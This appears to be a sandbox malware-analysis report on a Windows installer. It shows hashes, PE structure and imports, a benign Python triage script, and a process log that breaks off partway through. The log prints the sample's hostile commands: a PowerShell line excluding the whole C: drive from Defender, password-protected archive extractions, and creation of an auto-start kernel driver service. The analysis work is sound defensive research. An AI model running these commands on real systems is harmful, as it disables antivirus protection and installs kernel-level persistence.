                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:ASCII text, with CRLF, CR line terminators
                              Category:dropped
                              Size (bytes):406
                              Entropy (8bit):5.117520345541057
                              Encrypted:false
                              SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                              MD5:9200058492BCA8F9D88B4877F842C148
                              SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                              SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                              SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                              Malicious:false
                              Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.921235309481934
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.04%
                              • Inno Setup installer (109748/4) 1.08%
                              • InstallShield setup (43055/19) 0.42%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              File name:#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              File size:5'707'238 bytes
                              MD5:eb985a9c4c8c2ddc4b039f64b520fca9
                              SHA1:c96d6e0868dd3248261232bd53943abfa074ffce
                              SHA256:830caf16e52e098717a16ce8b2bda28f9a268746be2c77a6098e83941067b31c
                              SHA512:0bf08e1c95a4d0863f67bba18ba43520400972e115f50abe45518fd7246fb0b89c0e8e3302666ae331dde01d765dad44cad01af49b8c60fb77d377599965c5cc
                              SSDEEP:98304:XwREGjGWMsLAe53AKokM1mZDvmruKupjleyr2oEoDqTaMQ1m0idMwZgf:lGjGWMOhRZmiKuzeyyt3PEUs
                              TLSH:88461223F2C7E13EE05E0B3B06B2B15894FB6A506422AE5786ECB4ECCF651501D3E657
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                              Icon Hash:0c0c2d33ceec80aa
                              Entrypoint:0x4a83bc
                              Entrypoint Section:.itext
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:1
                              File Version Major:6
                              File Version Minor:1
                              Subsystem Version Major:6
                              Subsystem Version Minor:1
                              Import Hash:40ab50289f7ef5fae60801f88d4541fc
                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFA4h
                              push ebx
                              push esi
                              push edi
                              xor eax, eax
                              mov dword ptr [ebp-3Ch], eax
                              mov dword ptr [ebp-40h], eax
                              mov dword ptr [ebp-5Ch], eax
                              mov dword ptr [ebp-30h], eax
                              mov dword ptr [ebp-38h], eax
                              mov dword ptr [ebp-34h], eax
                              mov dword ptr [ebp-2Ch], eax
                              mov dword ptr [ebp-28h], eax
                              mov dword ptr [ebp-14h], eax
                              mov eax, 004A2EBCh
                              call 00007FDB652C4425h
                              xor eax, eax
                              push ebp
                              push 004A8AC1h
                              push dword ptr fs:[eax]
                              mov dword ptr fs:[eax], esp
                              xor edx, edx
                              push ebp
                              push 004A8A7Bh
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              mov eax, dword ptr [004B0634h]
                              call 00007FDB65355DABh
                              call 00007FDB653558FEh
                              lea edx, dword ptr [ebp-14h]
                              xor eax, eax
                              call 00007FDB653505D8h
                              mov edx, dword ptr [ebp-14h]
                              mov eax, 004B41F4h
                              call 00007FDB652BE4D3h
                              push 00000002h
                              push 00000000h
                              push 00000001h
                              mov ecx, dword ptr [004B41F4h]
                              mov dl, 01h
                              mov eax, dword ptr [0049CD14h]
                              call 00007FDB65351903h
                              mov dword ptr [004B41F8h], eax
                              xor edx, edx
                              push ebp
                              push 004A8A27h
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              call 00007FDB65355E33h
                              mov dword ptr [004B4200h], eax
                              mov eax, dword ptr [004B4200h]
                              cmp dword ptr [eax+0Ch], 01h
                              jne 00007FDB6535CB1Ah
                              mov eax, dword ptr [004B4200h]
                              mov edx, 00000028h
                              call 00007FDB653521F8h
                              mov edx, dword ptr [004B4200h]
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                               IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                               IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                               .rsrc | 0xcb000 | 0x11000 | 0x11000 | 162c4332f4d9aac559be41304700a4ec | False | 0.18785903033088236 | data | 3.721312151081868 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                               RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                               RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                               RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                               RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                               RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                               RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                               RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                               RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                               RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                               RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                               RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                               RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                               RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                               RT_STRING | 0xd8e00 | 0x3f8 | data | - | - | 0.3198818897637795
                               RT_STRING | 0xd91f8 | 0x2dc | data | - | - | 0.36475409836065575
                               RT_STRING | 0xd94d4 | 0x430 | data | - | - | 0.40578358208955223
                               RT_STRING | 0xd9904 | 0x44c | data | - | - | 0.38636363636363635
                               RT_STRING | 0xd9d50 | 0x2d4 | data | - | - | 0.39226519337016574
                               RT_STRING | 0xda024 | 0xb8 | data | - | - | 0.6467391304347826
                               RT_STRING | 0xda0dc | 0x9c | data | - | - | 0.6410256410256411
                               RT_STRING | 0xda178 | 0x374 | data | - | - | 0.4230769230769231
                               RT_STRING | 0xda4ec | 0x398 | data | - | - | 0.3358695652173913
                               RT_STRING | 0xda884 | 0x368 | data | - | - | 0.3795871559633027
                               RT_STRING | 0xdabec | 0x2a4 | data | - | - | 0.4275147928994083
                               RT_RCDATA | 0xdae90 | 0x10 | data | - | - | 1.5
                               RT_RCDATA | 0xdaea0 | 0x310 | data | - | - | 0.6173469387755102
                               RT_RCDATA | 0xdb1b0 | 0x2c | data | - | - | 1.1818181818181819
                               RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                               RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2804532577903683
                               RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                               DLL | Import
                               kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                               comctl32.dll | InitCommonControls
                               user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                               oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                               advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                               Name | Ordinal | Address
                               __dbk_fcall_wrapper | 2 | 0x40fc10
                               dbkFCallWrapperAddr | 1 | 0x4b063c
                               Language of compilation system | Country where language is spoken
                               English | United States
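A few triage checks that work from the static fields and section table above: which section the entry point falls in (the report says .itext), whether any section is both writable and executable or carries packer-grade entropy, and how much of the file lies outside every section. This is an added example written for this page, not Joe Sandbox code; the numbers are copied from the report, and the 0x400-byte header block used for the overlay estimate is an assumption, since the report does not list PointerToRawData.

```python
"""Triage checks over the static PE header fields and section table above.
Added example for this page, not Joe Sandbox code. The numbers are copied from
the report; HEADER_SIZE is an assumption (the report does not list
PointerToRawData), so the overlay figure assumes the sections are laid out
contiguously after a 0x400-byte header block."""
from typing import List, NamedTuple


class Section(NamedTuple):
    name: str
    va: int          # virtual address (RVA)
    vsize: int       # virtual size
    raw: int         # size of raw data in the file
    entropy: float
    flags: frozenset  # IMAGE_SCN_* names without the prefix


def S(name, va, vsize, raw, entropy, *flags):
    return Section(name, va, vsize, raw, entropy, frozenset(flags))


IMAGE_BASE, ENTRYPOINT, FILE_SIZE = 0x400000, 0x4a83bc, 5_707_238
HEADER_SIZE = 0x400  # assumption, see module docstring

SECTIONS = [  # from the section table above; entropies rounded to 3 places
    S(".text",   0x1000,  0xa568c, 0xa5800, 6.377, "CODE", "EXECUTE", "READ"),
    S(".itext",  0xa7000, 0x1b64,  0x1c00,  6.109, "CODE", "EXECUTE", "READ"),
    S(".data",   0xa9000, 0x3838,  0x3a00,  4.959, "INITIALIZED_DATA", "READ", "WRITE"),
    S(".bss",    0xad000, 0x7258,  0x0,     0.0,   "READ", "WRITE"),
    S(".idata",  0xb5000, 0xfec,   0x1000,  5.020, "INITIALIZED_DATA", "READ", "WRITE"),
    S(".didata", 0xb6000, 0x1a4,   0x200,   2.729, "INITIALIZED_DATA", "READ", "WRITE"),
    S(".edata",  0xb7000, 0x71,    0x200,   1.306, "INITIALIZED_DATA", "READ"),
    S(".tls",    0xb8000, 0x18,    0x0,     0.0,   "READ", "WRITE"),
    S(".rdata",  0xb9000, 0x5d,    0x200,   1.389, "INITIALIZED_DATA", "READ"),
    S(".reloc",  0xba000, 0x10fa8, 0x11000, 6.709, "INITIALIZED_DATA", "DISCARDABLE", "READ"),
    S(".rsrc",   0xcb000, 0x11000, 0x11000, 3.721, "INITIALIZED_DATA", "READ"),
]


def section_for_rva(rva, sections=SECTIONS):
    """Section whose in-memory range covers rva (the loader maps max(vsize, raw))."""
    for s in sections:
        if s.va <= rva < s.va + max(s.vsize, s.raw):
            return s
    return None


def overlay_size(file_size=FILE_SIZE, sections=SECTIONS, header_size=HEADER_SIZE):
    """Bytes of the file that no section claims, i.e. data appended after the last section."""
    return file_size - (header_size + sum(s.raw for s in sections))


def triage(sections=SECTIONS, entrypoint=ENTRYPOINT, image_base=IMAGE_BASE,
           file_size=FILE_SIZE) -> List[str]:
    """Heuristics an analyst applies before running the sample."""
    notes = []
    ep = section_for_rva(entrypoint - image_base, sections)
    if ep is None:
        notes.append("entry point lies outside every section")
    elif "EXECUTE" not in ep.flags:
        notes.append(f"entry point in non-executable section {ep.name}")
    for s in sections:
        if {"EXECUTE", "WRITE"} <= s.flags:
            notes.append(f"{s.name} is both writable and executable")
        if s.entropy >= 7.0:
            notes.append(f"{s.name} entropy {s.entropy:.2f} looks packed or encrypted")
        if "EXECUTE" in s.flags and s.raw and s.vsize > 2 * s.raw:
            notes.append(f"{s.name} reserves far more memory than it holds on disk (unpacking stub?)")
    overlay = overlay_size(file_size, sections)
    if overlay > 0:
        notes.append(f"{overlay} bytes of overlay after the last section")
    return notes
```

On this sample the entry point RVA 0xa83bc lands in .itext, matching the Entrypoint Section field above, and none of the section-level heuristics fire. The one note is the overlay: the section table accounts for 845,824 bytes (with the assumed header block) of a 5,707,238-byte file, so roughly 4.86 MB is appended data outside any section, consistent with the Inno Setup loader that the TrID line and the is-*.tmp\*.tmp /SL5= child process point to. That is also why the whole-file entropy (7.92) is far above every section's entropy.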
                              No network behavior found

                              Target ID:0
                              Start time:23:06:06
                              Start date:22/12/2024
                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe"
                              Imagebase:0xdb0000
                              File size:5'707'238 bytes
                              MD5 hash:EB985A9C4C8C2DDC4B039F64B520FCA9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:23:06:07
                              Start date:22/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe"
                              Imagebase:0xd70000
                              File size:3'366'912 bytes
                              MD5 hash:9902FA6D39184B87AED7D94A037912D8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:23:06:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:23:06:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:23:06:08
                              Start date:22/12/2024
                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
                              Imagebase:0xdb0000
                              File size:5'707'238 bytes
                              MD5 hash:EB985A9C4C8C2DDC4B039F64B520FCA9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:false

                              Target ID:5
                              Start time:23:06:08
                              Start date:22/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$20456,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
                              Imagebase:0xf20000
                              File size:3'366'912 bytes
                              MD5 hash:9902FA6D39184B87AED7D94A037912D8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:6
                              Start time:23:06:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                              Wow64 process (32bit):true
                              Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                              Imagebase:0xa60000
                              File size:831'200 bytes
                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:10
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                              Wow64 process (32bit):true
                              Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                              Imagebase:0xa60000
                              File size:831'200 bytes
                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:14
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
